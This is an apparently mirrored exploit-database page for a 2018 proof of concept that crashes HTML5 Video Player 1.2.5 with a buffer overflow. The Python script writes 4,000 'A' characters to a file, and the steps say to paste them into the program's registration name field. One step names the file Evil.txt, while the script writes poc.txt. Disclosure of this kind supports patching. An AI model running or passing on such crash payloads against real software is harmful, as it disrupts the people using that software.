Lucene search
K

HTML5 Video Player 1.2.5 Denial Of Service

🗓️ 12 Sep 2018 00:00:00Reported by T3jv1lType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

HTML5 Video Player 1.2.5 Denial Of Service exploit, Create "Evil.txt" file, Register Name buffer overflo

Code
`# Exploit Title: HTML5 Video Player 1.2.5 - Denial of Service (PoC)  
# Date: 2018-09-07  
# Exploit Author: T3jv1l  
# Vendor Homepage: http://www.html5videoplayer.net/download.html  
# Software: http://www.html5videoplayer.net/html5videoplayer-setup.exe  
# Contact: https://twitter.com/T3jv1l  
# Version: HTML5 Video Player V.1.2.5  
# Tested on: Windows 7 SP1 x86  
  
# PoC:  
# 1. Download and install the setup file  
# 2. A file "Evil.txt" will be created  
# 3. Click Help > Register... in tool bar  
# 4. Copy the contents of the file (poc.txt) and paste in the Registration Name field   
# 5. Click Activate and BOOMMMM !!!!   
  
#!/usr/bin/python  
  
buffer = "\x41" * 4000  
payload = buffer  
try:  
f=open("poc.txt","w")  
print "[+] Creating %s bytes payload..." %len(payload)  
f.write(payload)  
f.close()  
print "[+] File created!"  
except:  
print "File cannot be created"  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Sep 2018 00:00Current
0.1Low risk
Vulners AI Score0.1
24